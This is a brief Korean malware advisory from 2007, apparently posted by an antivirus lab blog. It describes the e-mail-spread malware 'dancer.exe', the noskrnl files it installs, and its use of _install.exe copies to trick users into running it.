    http://www.mycomgo.com/help/hp3.html

    뉴스
    http://www.segye.com/Service5/ShellView.asp?TreeID=1052&PCode=0007&DataID=200711021638000174
    Posted by viruslab

    댓글을 달아 주세요

    신종악성코드정보2007.11.09 10:38


    유포 : e-mail
    이름 : dancer.exe

    자신의 복사본과 컴포넌트 파일을 설치한다.

    %Windows%\noskrnl.exe
    %System%\NOSKRNL.SYS
    %System%\noskrnl.config

    임의의 폴더 등에 복사본인 _install.exe 를 생성하여 사용자 실행을 유도한다.

    Posted by viruslab

    댓글을 달아 주세요